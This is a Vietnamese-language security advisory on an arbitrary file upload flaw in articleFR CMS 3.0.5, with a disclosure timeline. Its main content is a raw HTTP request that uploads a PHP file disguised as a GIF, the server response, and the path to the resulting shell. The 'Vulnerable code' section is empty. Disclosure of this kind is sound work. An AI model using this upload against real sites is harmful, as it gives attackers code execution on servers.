ITAS Team đã phát hiện lỗ hổng “Arbitrary File Upload” trong articleFR CMS. Thông qua lỗ hổng này, hacker có thể upload tùy ý các tập tin lên Web Server. Nguyên nhân của lỗ hổng là do dữ chức năng upload kiểm tra định dạng tập tin bằng Javascript ở phía client mà không kiểm tra lại định dạng tập tin ở phía máy chủ.
Các cá nhân và tổ chức đang sử dụng CMS này nên xem xét và đưa ta giải pháp khắc phục.
Thông tin về lỗ hổng:
– Lỗ hổng: Arbitrarily File Upload
– Nhà sản xuất: http://freereprintables.com
– Download link: https://github.com/articlefr/articleFR
– Phiên bản lỗi: version 3.0.5
– Phát hiện bởi: Trần Đình Tiến (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
Chi tiết về lỗ hổng:
– REQUEST:
POST /articlefr/dashboard/videouploader.php HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/articlefr/dashboard/videos/fileupload/
Content-Length: 414
Content-Type: multipart/form-data; boundary=—————————277651700022570
Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
—————————–277651700022570
Content-Disposition: form-data; name=”myVideo”; filename=”img.php”
Content-Type: image/gif
phpinfo();
?>
—————————–277651700022570
Content-Disposition: form-data; name=””
undefined
—————————–277651700022570
Content-Disposition: form-data; name=””
undefined
—————————–277651700022570–
– RESPONSE:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 03:10:30 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: none
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 36
– Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php
– Vulnerable file: articlefr/dashboard/videouploader.php
– Vulnerable code:
Công bố thông tin:
– 09/12/2014: Liên hệ nhà sản xuất – nhà sản xuất không phản hồi
– 11/12/2014: Liên hệ nhà sản xuất – nhà sản xuất không phản hồi
– 12/12/2014: Liên hệ nhà sản xuất – nhà sản xuất phản hồi
– 23/12/2014: Gửi thông tin chi tiết cho nhà sản xuất – nhà sản xuất không phản hồi
– 21/01/2015: ITAS Team công bố thông tin
References: http://www.exploit-db.com/exploits/35858/